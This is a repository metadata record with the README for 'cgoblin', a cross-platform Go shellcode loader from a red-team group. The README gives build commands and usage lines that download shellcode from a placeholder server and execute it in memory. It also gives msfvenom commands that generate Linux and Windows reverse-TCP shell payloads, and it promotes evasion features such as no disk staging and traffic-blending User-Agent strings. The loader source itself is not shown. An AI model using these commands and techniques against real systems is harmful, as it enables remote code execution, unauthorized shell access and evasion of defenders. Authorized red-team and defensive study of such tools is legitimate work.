{"id":30130778,"url":"https://github.com/grisuno/cgoblin","last_synced_at":"2026-04-27T16:31:29.517Z","repository":{"id":307778551,"uuid":"1030677357","full_name":"grisuno/cgoblin","owner":"grisuno","description":"cgoblin run shellcode from an url in windows and linux","archived":false,"fork":false,"pushed_at":"2025-09-01T00:48:03.000Z","size":72,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-01T02:38:15.452Z","etag":null,"topics":["hacking","lazyown","linux","msfvenom-friendly","multiplatform","redteam","remote","shellcode","shellcode-loader","windows"],"latest_commit_sha":null,"homepage":"https://grisuno.github.io/LazyOwn/","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/grisuno.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-08-02T05:00:00.000Z","updated_at":"2025-09-01T00:48:07.000Z","dependencies_parsed_at":"2025-08-02T08:06:40.596Z","dependency_job_id":"86ae46bc-dbeb-4305-a171-4f886ac00c17","html_url":"https://github.com/grisuno/cgoblin","commit_stats":null,"previous_names":["grisuno/cgoblin"],"tags_count":0,"template":false,"template_full_name":"grisuno/template","purl":"pkg:github/grisuno/cgoblin","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/grisuno","download_url":"https://codeload.github.com/grisuno/cgoblin/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32345802,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T23:26:28.701Z","status":"online","status_checked_at":"2026-04-27T02:00:06.769Z","response_time":128,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","lazyown","linux","msfvenom-friendly","multiplatform","redteam","remote","shellcode","shellcode-loader","windows"],"created_at":"2025-08-10T18:05:00.252Z","updated_at":"2026-04-27T16:31:29.510Z","avatar_url":"https://github.com/grisuno.png","language":"Go","funding_links":["https://patreon.com/LazyOwn","https://ko-fi.com/Y8Y2Z73AV"],"categories":[],"sub_categories":[],"readme":"# 🧌 CGOblin – Cross-Platform Shellcode Loader\n\n\u003cimg width=\"1024\" height=\"1024\" alt=\"cgoblin\" src=\"https://github.com/user-attachments/assets/900668cf-cb18-4ef2-bab5-20aadcf01a36\" /\u003e\n\n**cgoblin** is a lightweight, cross-platform shellcode loader written in Go, capable of fetching and executing shellcode from a remote URL on both **Linux** and **Windows** systems. It leverages inline C via CGO to allocate executable memory and run position-independent machine code.\n\n\u003e 🔒 *For educational and red teaming purposes only.*\n\n\u003cimg width=\"689\" height=\"887\" alt=\"image\" src=\"https://github.com/user-attachments/assets/541df9f7-914b-4a89-b5e3-695c3d004a7c\" /\u003e\n\n\n---\n\n## 📦 Repository\n\n- **URL**: [https://github.com/grisuno/cgoblin.git](https://github.com/grisuno/cgoblin.git)\n- **Author**: [grisuno](https://github.com/grisuno)\n- **Team**: LazyOwn RedTeam\n\n---\n\n## 🚀 Features\n\n- ✅ Cross-platform support (Linux \u0026 Windows)\n- ✅ Remote shellcode loading via HTTP(S)\n- ✅ Shellcode parsing from `\\xNN` hex format\n- ✅ Memory allocation with execution permissions:\n  - Uses `mmap()` on Linux\n  - Uses `VirtualAlloc()` on Windows\n- ✅ Minimal footprint and no disk staging (in memory only)\n- ✅ Custom User-Agent and secure HTTP client settings\n\n---\n\u003cimg width=\"1515\" height=\"541\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f2852e22-0121-4c3c-96c6-58774579c703\" /\u003e\n\n## Prerequisites\n**CGOblin** requires a multi-language development environment supporting both Go and Python, with CGO compilation capabilities for system-level memory operations.\n\n### Core Requirements\nComponent\tVersion\tPurpose\n- Go\t1.24.2+\tCore application runtime and compilation\n- Python\t3.x\tLauncher script and development utilities [OPTIONAL]\n- CGO\tEnabled\tSystem call interface for memory operations\n- GCC/Clang\tLatest\tC compiler for CGO compilation\n\n## 🛠️ Usage\n\n\u003cimg width=\"691\" height=\"869\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8cb716c2-8193-4ab3-99b0-dc4de0b5479c\" /\u003e\n\n\n### Build\n\n\u003cimg width=\"857\" height=\"442\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c9297511-7fe5-4708-aef7-adbb0eefa739\" /\u003e\n\n\n```bash\n# Linux\nGOOS=linux go build -o loader_linux main.go loader_linux.go\n```\n\n```bash\n# Windows\nGOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -o loader_windows.exe\n```\n\n\u003cimg width=\"654\" height=\"851\" alt=\"image\" src=\"https://github.com/user-attachments/assets/88f85131-f90f-4197-a64a-9b8ad619043f\" /\u003e\n\n💡 Ensure CGO is enabled: CGO_ENABLED=1 (default when supported). \n\n```bash\n# Linux\n# Example\n./loader_linux -url http://your-server.com/shellcode.txt\n```\n\n\u003cimg width=\"1632\" height=\"780\" alt=\"image\" src=\"https://github.com/user-attachments/assets/20f636d1-1eaf-4cf1-bbbb-0be9cb821e6c\" /\u003e\n\n\n```bash\n# Windows\n# Example\npowershell .\\loader_windows.exe -url http://your-server.com/shellcode.txt\n```\n\n\u003cimg width=\"1058\" height=\"630\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a5f04378-bdd6-417e-941c-fd6217afd123\" /\u003e\n\n```bash\n# shellcode\n# Example\nunsigned char buf[] = \"\\x6a\\x29\\x58\\x99\\x...\";\n```\n\n⚠️ The loader parses only sequences matching \\x.. and ignores everything else. \n\n\u003cimg width=\"331\" height=\"873\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9c92957f-c060-47f5-865f-a01c8e5a767b\" /\u003e \u003cimg width=\"358\" height=\"815\" alt=\"image\" src=\"https://github.com/user-attachments/assets/af8fc684-ccc7-47b8-a0d5-ebec36decb79\" /\u003e\n\n```bash\n# shellcode \n# Example Linux\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt \n```\n```bash\n# shellcode \n# Example Windows\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt\n```\n\n```text\n# Tree\n# Example\n.\n├── go.mod               # Go module definition\n├── main.go              # Entry point with CLI flag parsing\n├── loader_linux.go      # Linux-specific execution logic (CGO + mmap)\n├── loader_windows.go    # Windows-specific execution logic (CGO + VirtualAlloc)\n├── shellcode_linux.txt  # Example Linux shellcode (bind/reverse shell)\n└── shellcode_win.txt    # Example Windows shellcode (e.g., Calc or Cmd)\n```\n\n📝 Example shellcode files are provided for testing (non-malicious use recommended). \n\n## 🧪 Testing Safely\n- To test without risk:\n\n- Host a simple shellcode (e.g., execve(\"/bin/sh\") on Linux or WinExec(\"calc.exe\") on Windows).\n- Use local HTTP server:\n\n```bash\n# Webserver\n# Example\npython3 -m http.server 8000\n```\n\n## Security and Operational Considerations\n### cgoblin implements several security-conscious design patterns:\n\n- Memory-only operations: No temporary files are created during shellcode processing\n- Custom HTTP headers: Configurable User-Agent strings to blend with legitimate traffic\n- Input validation: Shellcode size limits and format verification\n- Platform isolation: Platform-specific code paths prevent cross-contamination\n- CGO safety: Proper memory management in C interface layers\n\n## External Framework Integration\n### Relevant source files\nPurpose and Scope This document covers how **CGOblin** integrates with external exploitation frameworks and automation systems. The integration system allows external tools to automatically configure, build, and execute the shellcode loader with dynamically generated payloads. This capability enables **CGOblin** to function as a component within larger penetration testing suites and automated exploitation frameworks.\n\nFor information about the core shellcode loading functionality, see Core Shellcode Loader System. For details about the build system that supports framework integration, see Build System.\n\n### Framework Integration Architecture\nThe external framework integration system uses a YAML-based configuration approach that defines how external tools can interact with **CGOblin**. The integration supports parameter-driven payload generation and automated execution workflows.\n\n## 🛑 Disclaimer\nThis tool is intended for:\n\n- Security research\n- Red team operations\n- Authorized penetration testing\n- Do not use for unauthorized access or malicious purposes. The author and team assume no liability for misuse.\n\n## Compliance Framework\nUsers of cgoblin must ensure compliance with:\n\n- Local Computer Crime Laws: Unauthorized access laws vary by jurisdiction\n- Professional Ethics: Penetration testing codes of conduct\n- Contractual Obligations: Scope limitations in security assessments\n- Data Protection Regulations: Privacy laws when handling target systems\n\n\n## 🤝 Team: LazyOwn RedTeam\nA dedicated red team focused on offensive security, exploit development, and defensive evasion techniques.\n\n\"We break it to make it better — ethically.\" \n\n## 📄 License\nThis project is open-source for educational use. See LICENSE for details (**GPLv3**).\n\n\n# Links\n-    [+] **gomulti_loader** the little brother of **CGOblin**: [https://github.com/grisuno/gomulti_loader](https://github.com/grisuno/gomulti_loader)\n-    [+] Shorts: [https://www.youtube.com/shorts/kPZvVV_RNIE](https://www.youtube.com/shorts/kPZvVV_RNIE)\n-    [+] Deepwiki: [https://deepwiki.com/grisuno/cgoblin](https://deepwiki.com/grisuno/cgoblin)\n-    [+] Github: [https://github.com/grisuno/LazyOwn](https://github.com/grisuno/LazyOwn)\n-    [+] Web: [https://grisuno.github.io/LazyOwn/](https://grisuno.github.io/LazyOwn/)\n-    [+] Reddit: [https://www.reddit.com/r/LazyOwn/](https://www.reddit.com/r/LazyOwn/)\n-    [+] Facebook: [https://web.facebook.com/profile.php?id=61560596232150](https://web.facebook.com/profile.php?id=61560596232150)\n-    [+] HackTheBox: [https://app.hackthebox.com/teams/overview/6429 ](https://app.hackthebox.com/teams/overview/6429 )\n-    [+] Grisun0: [https://app.hackthebox.com/users/1998024](https://app.hackthebox.com/users/1998024)\n-    [+] Patreon: [https://patreon.com/LazyOwn ](https://patreon.com/LazyOwn )\n-    [↙] Download: [https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.47.tar.gz ](https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.58.tar.gz )\n\n![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge\u0026logo=python\u0026logoColor=ffdd54) ![Shell Script](https://img.shields.io/badge/shell_script-%23121011.svg?style=for-the-badge\u0026logo=gnu-bash\u0026logoColor=white) ![Flask](https://img.shields.io/badge/flask-%23000.svg?style=for-the-badge\u0026logo=flask\u0026logoColor=white) [![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)\n\n[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y2Z73AV)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgrisuno%2Fcgoblin","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgrisuno%2Fcgoblin","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgrisuno%2Fcgoblin/lists"}